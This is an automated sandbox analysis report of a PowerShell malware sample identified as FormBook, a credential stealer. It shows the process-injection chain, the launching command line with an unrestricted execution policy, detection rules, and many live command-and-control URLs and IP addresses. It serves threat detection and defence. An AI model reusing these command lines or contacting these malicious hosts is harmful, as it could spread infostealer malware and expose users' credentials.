Edit tour

Windows Analysis Report
laser (2).ps1

Overview

General Information

Sample name:	laser (2).ps1
Analysis ID:	1618208
MD5:	7ac3423210ed1bb180305d0035ddfe81
SHA1:	4f8c76bf32e5999b2be339a4132781b88d61dbfb
SHA256:	aeabb0a4ea0a655d44e11c613ba5f07496fadef5e6d36a17a700180c14dd9dd4
Tags:	ps1tumbetgirislinki-fituser-JAMESWT_MHT
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

Allocates memory in foreign processes

Contains functionality to inject code into remote processes

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

PE file contains section with special chars

PE file has nameless sections

Performs DNS queries to domains with low reputation

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious execution chain found

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Use Short Name Path in Command Line

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 6752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\laser (2).ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

x.exe (PID: 5260 cmdline: "C:\Users\user~1\AppData\Local\Temp\x.exe" MD5: 3194BA383C0DD1421010924545808026)

RegAsm.exe (PID: 6356 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 5128 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

pWjI78htpJ4.exe (PID: 1292 cmdline: "C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\qJ70pQvkMt.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

runonce.exe (PID: 1504 cmdline: "C:\Windows\SysWOW64\runonce.exe" MD5: 9E16655119DDE1B24A741C4FD4AD08FC)

pWjI78htpJ4.exe (PID: 6952 cmdline: "C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\l1unwRwGzd.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 3808 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

notepad.exe (PID: 4184 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\laser (2).ps1" MD5: 27F71B12CB585541885A31BE22F61C83)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.1733946439.0000000003040000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.3731547549.0000000002D40000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.3731493934.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.3727855592.00000000035E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.3719515035.0000000003200000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.1733243869.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000E.00000002.3731500134.0000000002CB0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.1735711958.00000000034B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: powershell.exe PID: 6752	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xc8a86:$b1: ::WriteAllBytes( 0xc8aa2:$b2: ::FromBase64String( 0xc914:$s1: -join 0xe89f:$s1: -join 0x1b52bc:$s1: -join 0x1c2391:$s1: -join 0x1c5763:$s1: -join 0x1c5e15:$s1: -join 0x1c7906:$s1: -join 0x1c9b0c:$s1: -join 0x1ca333:$s1: -join 0x1caba3:$s1: -join 0x1cb2de:$s1: -join 0x1cb310:$s1: -join 0x1cb358:$s1: -join 0x1cb377:$s1: -join 0x1cbbc7:$s1: -join 0x1cbd43:$s1: -join 0x1cbdbb:$s1: -join 0x1cbe4e:$s1: -join 0x1cc0b4:$s1: -join
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
6.2.RegAsm.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\laser (2).ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\laser (2).ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\laser (2).ps1", ProcessId: 6752, ProcessName: powershell.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\x.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\x.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\x.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\x.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\x.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\laser (2).ps1", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6752, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\x.exe" , ProcessId: 5260, ProcessName: x.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\laser (2).ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\laser (2).ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\laser (2).ps1", ProcessId: 6752, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T18:40:47.867254+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49969	162.218.30.235	80	TCP
2025-02-18T18:41:11.526828+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49973	103.106.67.112	80	TCP
2025-02-18T18:41:26.206386+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49977	104.21.80.1	80	TCP
2025-02-18T18:41:39.851300+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49981	104.21.80.1	80	TCP
2025-02-18T18:41:53.805176+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49985	134.122.135.48	80	TCP
2025-02-18T18:42:07.094922+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49989	162.0.231.203	80	TCP
2025-02-18T18:42:20.241829+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49993	66.33.60.67	80	TCP
2025-02-18T18:42:33.398234+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49997	13.248.169.48	80	TCP
2025-02-18T18:42:47.809288+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50001	160.238.85.158	80	TCP
2025-02-18T18:43:01.395310+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50005	217.160.0.240	80	TCP
2025-02-18T18:43:14.921013+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50009	188.114.96.3	80	TCP
2025-02-18T18:43:28.139729+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50013	199.59.243.228	80	TCP
2025-02-18T18:43:41.418629+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50017	199.59.243.228	80	TCP
2025-02-18T18:43:56.590864+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50021	162.210.199.73	80	TCP
2025-02-18T18:44:10.866627+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50025	213.176.96.198	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T18:41:03.868206+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49970	103.106.67.112	80	TCP
2025-02-18T18:41:06.439860+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49971	103.106.67.112	80	TCP
2025-02-18T18:41:09.233448+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49972	103.106.67.112	80	TCP
2025-02-18T18:41:18.100027+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49974	104.21.80.1	80	TCP
2025-02-18T18:41:20.646848+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49975	104.21.80.1	80	TCP
2025-02-18T18:41:23.193733+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49976	104.21.80.1	80	TCP
2025-02-18T18:41:32.771952+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49978	104.21.80.1	80	TCP
2025-02-18T18:41:34.714374+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49979	104.21.80.1	80	TCP
2025-02-18T18:41:37.167811+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49980	104.21.80.1	80	TCP
2025-02-18T18:41:46.144104+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49982	134.122.135.48	80	TCP
2025-02-18T18:41:48.718923+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49983	134.122.135.48	80	TCP
2025-02-18T18:41:51.227604+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49984	134.122.135.48	80	TCP
2025-02-18T18:41:59.470325+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49986	162.0.231.203	80	TCP
2025-02-18T18:42:02.035831+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49987	162.0.231.203	80	TCP
2025-02-18T18:42:04.538860+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49988	162.0.231.203	80	TCP
2025-02-18T18:42:12.664929+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49990	66.33.60.67	80	TCP
2025-02-18T18:42:15.223643+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49991	66.33.60.67	80	TCP
2025-02-18T18:42:17.706784+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49992	66.33.60.67	80	TCP
2025-02-18T18:42:25.744085+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49994	13.248.169.48	80	TCP
2025-02-18T18:42:28.314753+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49995	13.248.169.48	80	TCP
2025-02-18T18:42:30.842142+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49996	13.248.169.48	80	TCP
2025-02-18T18:42:40.066225+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49998	160.238.85.158	80	TCP
2025-02-18T18:42:42.687334+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49999	160.238.85.158	80	TCP
2025-02-18T18:42:45.157948+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50000	160.238.85.158	80	TCP
2025-02-18T18:42:53.773724+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50002	217.160.0.240	80	TCP
2025-02-18T18:42:56.305309+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50003	217.160.0.240	80	TCP
2025-02-18T18:42:58.859459+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50004	217.160.0.240	80	TCP
2025-02-18T18:43:07.154739+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50006	188.114.96.3	80	TCP
2025-02-18T18:43:09.704879+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50007	188.114.96.3	80	TCP
2025-02-18T18:43:12.318085+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50008	188.114.96.3	80	TCP
2025-02-18T18:43:20.515860+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50010	199.59.243.228	80	TCP
2025-02-18T18:43:23.078565+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50011	199.59.243.228	80	TCP
2025-02-18T18:43:25.630936+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50012	199.59.243.228	80	TCP
2025-02-18T18:43:33.771113+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50014	199.59.243.228	80	TCP
2025-02-18T18:43:36.299386+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50015	199.59.243.228	80	TCP
2025-02-18T18:43:38.851462+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50016	199.59.243.228	80	TCP
2025-02-18T18:43:47.204575+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50018	162.210.199.73	80	TCP
2025-02-18T18:43:49.828951+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50019	162.210.199.73	80	TCP
2025-02-18T18:43:52.450170+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50020	162.210.199.73	80	TCP
2025-02-18T18:44:03.033577+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50022	213.176.96.198	80	TCP
2025-02-18T18:44:05.721718+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50023	213.176.96.198	80	TCP
2025-02-18T18:44:08.124613+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50024	213.176.96.198	80	TCP
2025-02-18T18:44:16.418809+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50026	199.59.243.228	80	TCP
2025-02-18T18:44:18.983829+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50027	199.59.243.228	80	TCP
2025-02-18T18:44:21.522935+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50028	199.59.243.228	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.topitch.top/goj6/?jLKPrvv=90Ns8gSHVfuKmwMskYN175qt0l+UYxk4CHvhiyRIaCFX9JzO3hXkP8KhIgrW4So8W45OggNWRvJOekdu518DaUGFYZXR3z02vfmR3I3w4s/Ij1npIVCelEqXEJVOfL6H94xHE9RXLphk&3Je=YbIT	Avira URL Cloud: Label: malware
Source: http://www.lucynoel6465.shop/jgkl/?jLKPrvv=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpa+IqhGLYCnqltFYDkW9rwSVxH+ZM2/XnYhAogS2Zyd/o6zK+cbwINARG&3Je=YbIT	Avira URL Cloud: Label: malware
Source: https://www.seasay.xyz/c9ts/?jLKPrvv=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExA	Avira URL Cloud: Label: malware
Source: http://www.jyc11.top/baqk/	Avira URL Cloud: Label: malware
Source: http://www.besttreasurespot.shop	Avira URL Cloud: Label: malware
Source: http://www.jyc11.top/baqk/?jLKPrvv=uI1AML1lKsYfKpBjOYYBTsW2eceMYAINrtsxZHex5MMBBnuaf6/bImWsfHxWa/VaEP1krQYtY2JPJ2rDPpQjXb/1t9o3oBCV/hwDbWSGcgceG0DIqaiwMJhtI/GZr2tc+jDdjdgzJXC1&3Je=YbIT	Avira URL Cloud: Label: malware
Source: http://www.kjuw.party/e0jv/?jLKPrvv=T5a+nPXa7vHYgORYo4/nz9dQiuUIDqRyja1Bw4L97U3J4ftOxLqNqCnP0drWj2p7z+i5x9/xm7UTGnu+MMyQhOsx+uzIcWWFswczbpvbbSQGGU4ijnRmFI/iSrohGZkBVJ02P2fo5ikl&3Je=YbIT	Avira URL Cloud: Label: malware
Source: http://www.l63339.xyz/vhr7/?3Je=YbIT&jLKPrvv=iaSfD1StI7hDT4qIAMii2AJAHOe0qHDn7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4s0DPw8ZLv8n+jVvEkjzRDyf1FFJKGTm/x08ZOhgwkEPf0hvFuhdZt1S6	Avira URL Cloud: Label: malware
Source: http://www.topitch.top/goj6/	Avira URL Cloud: Label: phishing
Source: http://www.besttreasurespot.shop/xvk7/?jLKPrvv=D2H6cq8Q3DqiMWUz+FL3wQH40ji/h/G6FkzDQm1Pm2pV5QPYVMTgQxtmL2CGdLit/09zCaV5brcnjhHMK3Gueaf12Ye+Amp96oHs3fpUhIM3fzUce1anmYo//XoVbQduiVtmIFHvIsto&3Je=YbIT	Avira URL Cloud: Label: malware
Source: http://www.besttreasurespot.shop/xvk7/	Avira URL Cloud: Label: malware
Source: http://www.seasay.xyz/c9ts/?jLKPrvv=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7Qzpj06nGEzNEnovnPrsEb7KL1brrzNpzul2VEXvMTZ1g4GQAuWECb3v8&3Je=YbIT	Avira URL Cloud: Label: malware
Source: http://www.tumbetgirislinki.fit/k566/?3Je=YbIT&jLKPrvv=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe+MdLjldftk+pS4j839nhzGVAWPSO5aQYaeXSj4P+pnuEIGWZVsh7JvfN	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

ReversingLabs: Detection: 87%

Multi AV Scanner detection for submitted file

Source: laser (2).ps1	Virustotal: Detection: 49%			Perma Link
Source: laser (2).ps1	ReversingLabs: Detection: 40%

Yara detected FormBook

Source: Yara match	File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1733946439.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3731547549.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3731493934.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3727855592.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3719515035.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1733243869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3731500134.0000000002CB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1735711958.00000000034B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source:	Binary string: CVZXCVHDF.pdb source: powershell.exe, 00000000.00000002.1265979436.000000000621D000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1249155312.0000000000C5E000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
Source:	Binary string: runonce.pdbGCTL source: pWjI78htpJ4.exe, 0000000E.00000002.3729154264.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000006.00000002.1734135960.0000000003160000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.3731805345.00000000053CE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.3731805345.0000000005230000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.1733521819.0000000004ED3000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.1735774636.0000000005086000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000006.00000002.1734135960.0000000003160000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, runonce.exe, 0000000F.00000002.3731805345.00000000053CE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.3731805345.0000000005230000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.1733521819.0000000004ED3000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.1735774636.0000000005086000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CVZXCVHDF.pdb\ source: powershell.exe, 00000000.00000002.1265979436.000000000621D000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1249155312.0000000000C5E000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
Source:	Binary string: runonce.pdb source: pWjI78htpJ4.exe, 0000000E.00000002.3729154264.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pWjI78htpJ4.exe, 0000000E.00000002.3720605673.00000000006EF000.00000002.00000001.01000000.0000000C.sdmp, pWjI78htpJ4.exe, 00000010.00000000.1800564375.00000000006EF000.00000002.00000001.01000000.0000000C.sdmp

Source: C:\Windows\SysWOW64\runonce.exe

Code function: 15_2_0321C8D0 FindFirstFileW,FindNextFileW,FindClose,

15_2_0321C8D0

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Source: C:\Windows\SysWOW64\runonce.exe	Code function: 4x nop then xor eax, eax	15_2_03209EF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 4x nop then mov ebx, 00000004h	15_2_04FD04E8
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 4x nop then pop edi	16_2_02D62A95
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 4x nop then pop edi	16_2_02D60AA6
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 4x nop then xor eax, eax	16_2_02D662A3
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 4x nop then pop edi	16_2_02D71A1A
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 4x nop then pop edi	16_2_02D718A4
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 4x nop then pop edi	16_2_02D71860
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 4x nop then pop edi	16_2_02D71989
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 4x nop then pop edi	16_2_02D7193C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49973 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49971 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49980 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49975 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49995 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49969 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50007 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49981 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49979 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49970 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49987 -> 162.0.231.203:80
